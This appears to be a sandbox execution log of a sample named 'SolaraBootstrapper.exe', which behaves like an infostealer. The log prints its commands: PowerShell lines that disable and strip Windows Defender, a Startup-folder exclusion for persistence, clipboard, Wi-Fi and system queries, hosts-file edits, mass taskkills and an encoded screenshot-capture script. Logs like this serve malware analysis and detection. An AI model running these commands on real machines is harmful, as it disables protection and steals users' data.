"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,5468015621481243386,6003461982466912380,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6316 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,5468015621481243386,6003461982466912380,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2192 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,5468015621481243386,6003461982466912380,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4728 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,5468015621481243386,6003461982466912380,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6812 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,5468015621481243386,6003461982466912380,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6288 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,5468015621481243386,6003461982466912380,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3560 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,5468015621481243386,6003461982466912380,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3064 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2036,5468015621481243386,6003461982466912380,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=7032 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,5468015621481243386,6003461982466912380,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6548 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2036,5468015621481243386,6003461982466912380,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6608 /prefetch:8

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Users\Admin\Desktop\SolaraBootstrapper.exe

"C:\Users\Admin\Desktop\SolaraBootstrapper.exe"

C:\Users\Admin\Desktop\SolaraBootstrapper.exe

"C:\Users\Admin\Desktop\SolaraBootstrapper.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\SolaraBootstrapper.exe'"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\SolaraBootstrapper.exe'

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\System32\Wbem\WMIC.exe

wmic csproduct get uuid

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"

C:\Windows\system32\reg.exe

REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"

C:\Windows\system32\reg.exe

REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\Desktop\SolaraBootstrapper.exe""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\     .scr'"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\     .scr'

C:\Windows\system32\attrib.exe

attrib +h +s "C:\Users\Admin\Desktop\SolaraBootstrapper.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\System32\Wbem\WMIC.exe

WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "netsh wlan show profile"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "systeminfo"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\system32\systeminfo.exe

systeminfo

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=

C:\Windows\system32\netsh.exe

netsh wlan show profile

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\reg.exe

REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\attrib.exe

attrib -r C:\Windows\System32\drivers\etc\hosts

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\bmptq0c5\bmptq0c5.cmdline"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\attrib.exe

attrib +r C:\Windows\System32\drivers\etc\hosts

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES61CD.tmp" "c:\Users\Admin\AppData\Local\Temp\bmptq0c5\CSC46BA902160346CDB1D380E4CDDC3C39.TMP"

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4220"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4220"

C:\Windows\system32\taskkill.exe

taskkill /F /PID 4220

C:\Windows\system32\taskkill.exe

taskkill /F /PID 4220

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2212"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2212"

C:\Windows\system32\taskkill.exe

taskkill /F /PID 2212

C:\Windows\system32\taskkill.exe

taskkill /F /PID 2212

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3196"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3196"

C:\Windows\system32\taskkill.exe

taskkill /F /PID 3196

C:\Windows\system32\taskkill.exe

taskkill /F /PID 3196

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3580"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3580"

C:\Windows\system32\taskkill.exe

taskkill /F /PID 3580

C:\Windows\system32\taskkill.exe

taskkill /F /PID 3580

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2860"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2860"

C:\Windows\system32\taskkill.exe

taskkill /F /PID 2860

C:\Windows\system32\taskkill.exe

taskkill /F /PID 2860

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /PID 592"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /PID 592"

C:\Windows\system32\taskkill.exe

taskkill /F /PID 592

C:\Windows\system32\taskkill.exe

taskkill /F /PID 592

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /PID 5876"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /PID 5876"

C:\Windows\system32\taskkill.exe

taskkill /F /PID 5876

C:\Windows\system32\taskkill.exe

taskkill /F /PID 5876

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /PID 5236"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /PID 5236"

C:\Windows\system32\taskkill.exe

taskkill /F /PID 5236

C:\Windows\system32\taskkill.exe

taskkill /F /PID 5236

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /PID 5436"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /PID 5436"

C:\Windows\system32\taskkill.exe

taskkill /F /PID 5436

C:\Windows\system32\taskkill.exe

taskkill /F /PID 5436

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /PID 5564"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /PID 5564"

C:\Windows\system32\taskkill.exe

taskkill /F /PID 5564

C:\Windows\system32\taskkill.exe

taskkill /F /PID 5564

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3360"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3360"

C:\Windows\system32\taskkill.exe

taskkill /F /PID 3360

C:\Windows\system32\taskkill.exe

taskkill /F /PID 3360

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /PID 712"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /PID 712"

C:\Windows\system32\taskkill.exe

taskkill /F /PID 712

C:\Windows\system32\taskkill.exe

taskkill /F /PID 712

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /PID 5096"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /PID 5096"

C:\Windows\system32\taskkill.exe

taskkill /F /PID 5096

C:\Windows\system32\taskkill.exe

taskkill /F /PID 5096

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4128"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4128"

C:\Windows\system32\taskkill.exe

taskkill /F /PID 4128

C:\Windows\system32\taskkill.exe

taskkill /F /PID 4128

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /PID 5112"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\cmd.exe

